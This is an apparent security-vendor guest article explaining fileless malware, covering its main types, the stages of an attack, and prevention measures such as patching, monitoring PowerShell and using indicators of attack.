Guarding Against Fileless Malware: Types and Prevention
Fileless malware, true to its name, is malicious code that uses existing legitimate programs in a system for compromise. It operates directly in the Random Access Memory (RAM) without requiring any executable files in the hard drive. Differing from conventional malware, fileless attacks are stealthier in nature, falling under the category of low-observable characteristics (LOC) attacks. Since these attacks have no identifiable code or signature, traditional defense mechanisms such as antivirus, whitelisting, and endpoint detection systems often struggle to detect these attacks.
When a victim accidentally clicks a malicious link or an attachment in a phishing email, it triggers the exploit, often using shellcode such as PowerShell to avoid detection and eliminate the trace of its activity. Afterward, it runs commands to download and execute payload solely within the system memory.
Types of fileless malware
Several major types of fileless malware include:
- Memory resident malware – Exists solely within the memory of a valid Windows file, rendering the malware fileless and resistant to detection by standard antivirus tools.
- Windows registry resident malware – This malware remains in the Windows registry, using a program known as a “dropper” to insert harmful code. It can be set to run whenever the system starts, bypassing traditional antivirus scans.
- Rootkits – Rootkits exist within the operating system kernel rather than a file. Rootkits masquerade as the normal operating system, allowing them to completely evade detection.
- Exploit kits – Exploit kits are sets of tools targeting system vulnerabilities. They target the system memory without writing to the storage media. They include exploits for multiple vulnerabilities and a management console. Some even scan existing vulnerabilities and launch tailored attacks instantly.
- Fileless ransomware – Today’s ransomware attacks use fileless tactics, concealing malicious code in documents through macros or exploiting memory. This enables ransomware to control built-in system tools like PowerShell, encrypting files without leaving a trace on the system.
- False credentials – The threat actor gains access to the system using the compromised username and password combinations to implement a shellcode to execute an attack. They remain persistent in the system by hiding code in the registry or kernel or by creating user accounts for system access.
Stages of a fileless malware attack
The process of a fileless malware attack shares similarities with a file-based attack. The steps involved include:
- Gaining access – Access to the target machine is achieved through social engineering tactics such as phishing emails and websites or compromised credentials.
- Execution – Once fileless malware enters a system, it executes code by manipulating local software, libraries, or available resources.
- Persistence – After the malware gains control of the system, it often creates a hidden entry point, known as a backdoor, for continuous access by the threat actor. This ensures prolonged data collection without losing control.
- Achieving the objectives – Finally, the threat actor executes the intended motive, which could involve data exfiltration, credential theft, file encryption, malware downloads, or other malicious activities.
Prevention against fileless malware
The following precautions are necessary to ensure protection against fileless malware:
- Update and patch software and systems regularly – Minimize malware entry points through regular updates, as these attacks frequently exploit unpatched vulnerabilities.
- Monitor native operating system tools – Since fileless attacks exploit legitimate processes, organizations should closely monitor unusual activity in built-in legitimate processes, such as PowerShell. Look out for unauthorized changes in user privileges, unfamiliar processes executing in the main memory, remote command execution via PowerShell, and suspicious alterations in the Windows registry.
- Use Indicators of Attack (IOA) Instead of Indicators of Compromise (IOC) – Instead of searching for malicious files, observe your system for signs of unusual and suspicious activity.
Conclusion
Fileless malware is a subtle yet evolving threat that manipulates genuine processes, which makes detection more difficult. It includes different types and often uses phishing tactics for execution. It is crucial that organizations take necessary precautions, such as prioritizing continuous monitoring and updates to safeguard their systems.
Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire.